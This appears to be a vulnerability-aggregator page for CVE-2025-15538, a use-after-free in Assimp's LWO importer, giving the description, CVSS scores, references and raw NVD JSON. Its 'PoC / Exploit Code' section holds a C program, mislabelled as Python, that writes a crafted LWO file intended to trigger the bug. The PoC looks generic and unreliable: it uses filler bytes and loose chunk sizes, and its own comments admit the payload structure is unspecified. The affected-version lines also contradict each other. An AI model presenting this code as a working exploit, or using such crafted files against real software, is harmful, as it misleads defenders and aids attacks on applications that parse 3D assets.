CVE-2025-15538

Description

A security vulnerability has been detected in Open Asset Import Library Assimp up to 6.0.2. Affected by this vulnerability is the function Assimp::LWOImporter::FindUVChannels of the file /src/assimp/code/AssetLib/LWO/LWOMaterial.cpp. Such manipulation leads to use after free. The attack needs to be performed locally. The exploit has been disclosed publicly and may be used. This and similar defects are tracked and handled via issue #6128.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:assimp:assimp:*:*:*:*:*:*:*:* - VULNERABLE

Assimp < 6.0.2

Assimp 6.0.2及以下所有版本

Open Asset Import Library (Assimp) up to 6.0.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// PoC for CVE-2025-15538: Assimp Use-After-Free in LWOImporter
// This PoC creates a malicious LWO file to trigger the vulnerability

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// LWO file format structures
typedef struct {
    char id[4];
    int size;
} LWO_CHUNK_HEADER;

void create_malicious_lwo(const char* filename) {
    FILE* fp = fopen(filename, "wb");
    if (!fp) {
        printf("Failed to create file\n");
        return;
    }
    
    // LWO format header
    fprintf(fp, "FORM");
    fwrite("\x00\x00\x10\x00", 4, 1, fp); // Form size
    fprintf(fp, "LWO2");
    
    // Crafted tags to trigger FindUVChannels vulnerability
    // The specific payload structure depends on assimp version
    fprintf(fp, "TAGS");
    int tag_size = 0x100; // Large size to trigger memory issue
    fwrite(&tag_size, 4, 1, fp);
    
    // Fill with crafted data
    for (int i = 0; i < tag_size; i++) {
        fputc(0x41, fp); // Fill with 'A'
    }
    
    // Crafted SURF chunk
    fprintf(fp, "SURF");
    int surf_size = 0x200;
    fwrite(&surf_size, 4, 1, fp);
    fprintf(fp, "BLOK");
    int blok_size = 0x180;
    fwrite(&blok_size, 4, 1, fp);
    
    // UV channel data that triggers the UAF
    fprintf(fp, "TMAP");
    fprintf(fp, "CHAN");
    fwrite("TXUV", 4, 1, fp);
    
    fclose(fp);
    printf("Malicious LWO file created: %s\n", filename);
}

int main() {
    create_malicious_lwo("CVE-2025-15538_poc.lwo");
    printf("PoC for CVE-2025-15538 generated\n");
    printf("Use assimp to open this file to trigger the vulnerability\n");
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15538
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15538
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15538/
[4] VulDB https://vuldb.com/cve/CVE-2025-15538
[5] https://github.com/assimp/assimp/issues/6258
[6] https://github.com/assimp/assimp/issues/6258#issuecomment-3070999530
[7] https://github.com/user-attachments/files/21216542/assimp_poc10.zip
[8] https://vuldb.com/?ctiid.341727
[9] https://vuldb.com/?id.341727
[10] https://vuldb.com/?submit.735232

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15538", "sourceIdentifier": "[email protected]", "published": "2026-01-18T23:15:47.653", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in Open Asset Import Library Assimp up to 6.0.2. Affected by this vulnerability is the function Assimp::LWOImporter::FindUVChannels of the file /src/assimp/code/AssetLib/LWO/LWOMaterial.cpp. Such manipulation leads to use after free. The attack needs to be performed locally. The exploit has been disclosed publicly and may be used. This and similar defects are tracked and handled via issue #6128."}, {"lang": "es", "value": "Se ha detectado una vulnerabilidad de seguridad en la librería de Importación de Activos Abiertos Assimp hasta la versión 6.0.2. Afectada por esta vulnerabilidad es la función Assimp::LWOImporter::FindUVChannels del archivo /src/assimp/code/AssetLib/LWO/LWOMaterial.cpp. Dicha manipulación conduce a un uso después de liberar. El ataque debe realizarse localmente. El exploit ha sido divulgado públicamente y puede ser utilizado. Este y defectos similares son rastreados y gestionados a través del problema #6128."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 4.3, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 3.1, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-416"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:assimp:assimp:*:*:*:*:*:*:*:*", "versionEndIncluding": "6.0.2", "matchCriteriaId": "ED32CB1C-0488-48DD-B53F-20730D623FB2"}]}]}], "references": [{"url": "https://github.com/assimp/assimp/issues/6258", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/assimp/assimp/issues/6258#issuecomment-3070999530", "source": "cn ... (truncated)